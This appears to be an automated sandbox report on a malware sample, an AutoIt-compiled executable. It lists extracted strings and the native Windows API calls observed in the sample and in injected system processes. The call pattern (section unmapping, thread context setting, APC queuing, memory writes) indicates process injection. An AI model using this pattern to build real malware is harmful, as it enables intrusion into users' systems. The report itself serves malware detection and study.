Source: FG5wHs4fVX.exe, 00000000.00000000.1391345732.0000000000822000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_4d625d68-a
Source: FG5wHs4fVX.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_837830de-e
Source: FG5wHs4fVX.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_8d4b5225-e

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0034C973 NtClose,	2_2_0034C973
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42B60 NtClose,LdrInitializeThunk,	2_2_00B42B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_00B42DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B435C0 NtCreateMutant,LdrInitializeThunk,	2_2_00B435C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B44340 NtSetContextThread,	2_2_00B44340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B44650 NtSuspendThread,	2_2_00B44650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42AB0 NtWaitForSingleObject,	2_2_00B42AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42AF0 NtWriteFile,	2_2_00B42AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42AD0 NtReadFile,	2_2_00B42AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42BA0 NtEnumerateValueKey,	2_2_00B42BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42B80 NtQueryInformationFile,	2_2_00B42B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42BF0 NtAllocateVirtualMemory,	2_2_00B42BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42BE0 NtQueryValueKey,	2_2_00B42BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42CA0 NtQueryInformationToken,	2_2_00B42CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42CF0 NtOpenProcess,	2_2_00B42CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42CC0 NtQueryVirtualMemory,	2_2_00B42CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42C00 NtQueryInformationProcess,	2_2_00B42C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42C70 NtFreeVirtualMemory,	2_2_00B42C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42C60 NtCreateKey,	2_2_00B42C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42DB0 NtEnumerateKey,	2_2_00B42DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42DD0 NtDelayExecution,	2_2_00B42DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42D30 NtUnmapViewOfSection,	2_2_00B42D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42D10 NtMapViewOfSection,	2_2_00B42D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42D00 NtSetInformationFile,	2_2_00B42D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42EA0 NtAdjustPrivilegesToken,	2_2_00B42EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42E80 NtReadVirtualMemory,	2_2_00B42E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42EE0 NtQueueApcThread,	2_2_00B42EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42E30 NtWriteVirtualMemory,	2_2_00B42E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42FB0 NtResumeThread,	2_2_00B42FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42FA0 NtQuerySection,	2_2_00B42FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42F90 NtProtectVirtualMemory,	2_2_00B42F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42FE0 NtCreateFile,	2_2_00B42FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42F30 NtCreateSection,	2_2_00B42F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42F60 NtCreateProcessEx,	2_2_00B42F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B43090 NtSetValueKey,	2_2_00B43090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B43010 NtOpenDirectoryObject,	2_2_00B43010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B439B0 NtGetContextThread,	2_2_00B439B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B43D10 NtOpenProcessToken,	2_2_00B43D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B43D70 NtOpenThread,	2_2_00B43D70
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F24650 NtSuspendThread,LdrInitializeThunk,	7_2_04F24650
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F24340 NtSetContextThread,LdrInitializeThunk,	7_2_04F24340
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_04F22CA0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_04F22C70
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22C60 NtCreateKey,LdrInitializeThunk,	7_2_04F22C60
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_04F22DF0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22DD0 NtDelayExecution,LdrInitializeThunk,	7_2_04F22DD0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22D30 NtUnmapViewOfSection,LdrInitializeThunk,	7_2_04F22D30
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_04F22D10
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22EE0 NtQueueApcThread,LdrInitializeThunk,	7_2_04F22EE0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22E80 NtReadVirtualMemory,LdrInitializeThunk,	7_2_04F22E80
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22FE0 NtCreateFile,LdrInitializeThunk,	7_2_04F22FE0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22FB0 NtResumeThread,LdrInitializeThunk,	7_2_04F22FB0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22F30 NtCreateSection,LdrInitializeThunk,	7_2_04F22F30
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22AF0 NtWriteFile,LdrInitializeThunk,	7_2_04F22AF0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22AD0 NtReadFile,LdrInitializeThunk,	7_2_04F22AD0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_04F22BF0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22BE0 NtQueryValueKey,LdrInitializeThunk,	7_2_04F22BE0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22BA0 NtEnumerateValueKey,LdrInitializeThunk,	7_2_04F22BA0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22B60 NtClose,LdrInitializeThunk,	7_2_04F22B60
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F235C0 NtCreateMutant,LdrInitializeThunk,	7_2_04F235C0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F239B0 NtGetContextThread,LdrInitializeThunk,	7_2_04F239B0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22CF0 NtOpenProcess,	7_2_04F22CF0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22CC0 NtQueryVirtualMemory,	7_2_04F22CC0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22C00 NtQueryInformationProcess,	7_2_04F22C00
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22DB0 NtEnumerateKey,	7_2_04F22DB0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22D00 NtSetInformationFile,	7_2_04F22D00
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22EA0 NtAdjustPrivilegesToken,	7_2_04F22EA0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22E30 NtWriteVirtualMemory,	7_2_04F22E30
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22FA0 NtQuerySection,	7_2_04F22FA0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22F90 NtProtectVirtualMemory,	7_2_04F22F90
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22F60 NtCreateProcessEx,	7_2_04F22F60
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22AB0 NtWaitForSingleObject,	7_2_04F22AB0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F22B80 NtQueryInformationFile,	7_2_04F22B80
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F23090 NtSetValueKey,	7_2_04F23090
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F23010 NtOpenDirectoryObject,	7_2_04F23010
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F23D70 NtOpenThread,	7_2_04F23D70
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F23D10 NtOpenProcessToken,	7_2_04F23D10
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00CA90B0 NtCreateFile,	7_2_00CA90B0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00CA9210 NtReadFile,	7_2_00CA9210
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00CA93A0 NtClose,	7_2_00CA93A0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00CA9300 NtDeleteFile,	7_2_00CA9300
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00CA9500 NtAllocateVirtualMemory,	7_2_00CA9500
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04CFF9A3 NtSetContextThread,	7_2_04CFF9A3

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007CD5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_007CD5EB

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007C1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_007C1201

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007CE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_007CE8F6

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_00768060	0_2_00768060
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007D2046	0_2_007D2046
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007C8298	0_2_007C8298
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_0079E4FF	0_2_0079E4FF
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_0079676B	0_2_0079676B
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007F4873	0_2_007F4873
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_0076CAF0	0_2_0076CAF0
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_0078CAA0	0_2_0078CAA0
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_0077CC39	0_2_0077CC39
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_00796DD9	0_2_00796DD9
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_0077B119	0_2_0077B119
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007691C0	0_2_007691C0
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_00781394	0_2_00781394
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_00781706	0_2_00781706
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_0078781B	0_2_0078781B
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_0077997D	0_2_0077997D
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_00767920	0_2_00767920
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007819B0	0_2_007819B0
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_00787A4A	0_2_00787A4A
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_00781C77	0_2_00781C77
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_00787CA7	0_2_00787CA7
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007EBE44	0_2_007EBE44
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_00799EEE	0_2_00799EEE
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_00781F32	0_2_00781F32
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_012448A8	0_2_012448A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00338853	2_2_00338853
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003210D0	2_2_003210D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003210C8	2_2_003210C8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003301F3	2_2_003301F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003229F0	2_2_003229F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0032E1D3	2_2_0032E1D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00336A53	2_2_00336A53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00336A4E	2_2_00336A4E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00323330	2_2_00323330
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0032E323	2_2_0032E323
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0032E318	2_2_0032E318
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003226C0	2_2_003226C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0034EF93	2_2_0034EF93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0032FFD3	2_2_0032FFD3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BA2000	2_2_00BA2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BD01AA	2_2_00BD01AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BC81CC	2_2_00BC81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAA118	2_2_00BAA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B00100	2_2_00B00100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B98158	2_2_00B98158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B902C0	2_2_00B902C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB0274	2_2_00BB0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B1E3F0	2_2_00B1E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BD03E6	2_2_00BD03E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BCA352	2_2_00BCA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BBE4F6	2_2_00BBE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB4420	2_2_00BB4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BC2446	2_2_00BC2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BD0591	2_2_00BD0591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10535	2_2_00B10535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2C6E0	2_2_00B2C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0C7C0	2_2_00B0C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10770	2_2_00B10770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B34750	2_2_00B34750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AF68B8	2_2_00AF68B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3E8F0	2_2_00B3E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B1A840	2_2_00B1A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B12840	2_2_00B12840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B129A0	2_2_00B129A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BDA9A6	2_2_00BDA9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B26962	2_2_00B26962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0EA80	2_2_00B0EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BC6BD7	2_2_00BC6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BCAB40	2_2_00BCAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB0CB5	2_2_00BB0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B00CF2	2_2_00B00CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10C00	2_2_00B10C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B28DBF	2_2_00B28DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0ADE0	2_2_00B0ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BACD1F	2_2_00BACD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B1AD00	2_2_00B1AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B22E90	2_2_00B22E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BCCE93	2_2_00BCCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BCEEDB	2_2_00BCEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BCEE26	2_2_00BCEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10E59	2_2_00B10E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8EFA0	2_2_00B8EFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B1CFE0	2_2_00B1CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B02FC8	2_2_00B02FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B30F30	2_2_00B30F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB2F30	2_2_00BB2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B52F28	2_2_00B52F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B84F40	2_2_00B84F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BC70E9	2_2_00BC70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BCF0E0	2_2_00BCF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B170C0	2_2_00B170C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BBF0CC	2_2_00BBF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B1B1B0	2_2_00B1B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BDB16B	2_2_00BDB16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B4516C	2_2_00B4516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AFF172	2_2_00AFF172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B152A0	2_2_00B152A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB12ED	2_2_00BB12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2B2C0	2_2_00B2B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B5739A	2_2_00B5739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BC132D	2_2_00BC132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AFD34C	2_2_00AFD34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BCF43F	2_2_00BCF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B01460	2_2_00B01460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAD5B0	2_2_00BAD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BC7571	2_2_00BC7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BC16CC	2_2_00BC16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BCF7B0	2_2_00BCF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B138E0	2_2_00B138E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7D800	2_2_00B7D800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BA5910	2_2_00BA5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B19950	2_2_00B19950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2B950	2_2_00B2B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B55AA0	2_2_00B55AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BADAAC	2_2_00BADAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB1AA3	2_2_00BB1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BBDAC6	2_2_00BBDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B83A6C	2_2_00B83A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BCFA49	2_2_00BCFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BC7A46	2_2_00BC7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2FB80	2_2_00B2FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B85BF0	2_2_00B85BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B4DBF9	2_2_00B4DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BCFB76	2_2_00BCFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BCFCF2	2_2_00BCFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B89C32	2_2_00B89C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2FDC0	2_2_00B2FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BC7D73	2_2_00BC7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BC1D5A	2_2_00BC1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B13D40	2_2_00B13D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B19EB0	2_2_00B19EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BCFFB1	2_2_00BCFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B11F92	2_2_00B11F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BCFF09	2_2_00BCFF09
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F9E4F6	7_2_04F9E4F6
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FA2446	7_2_04FA2446
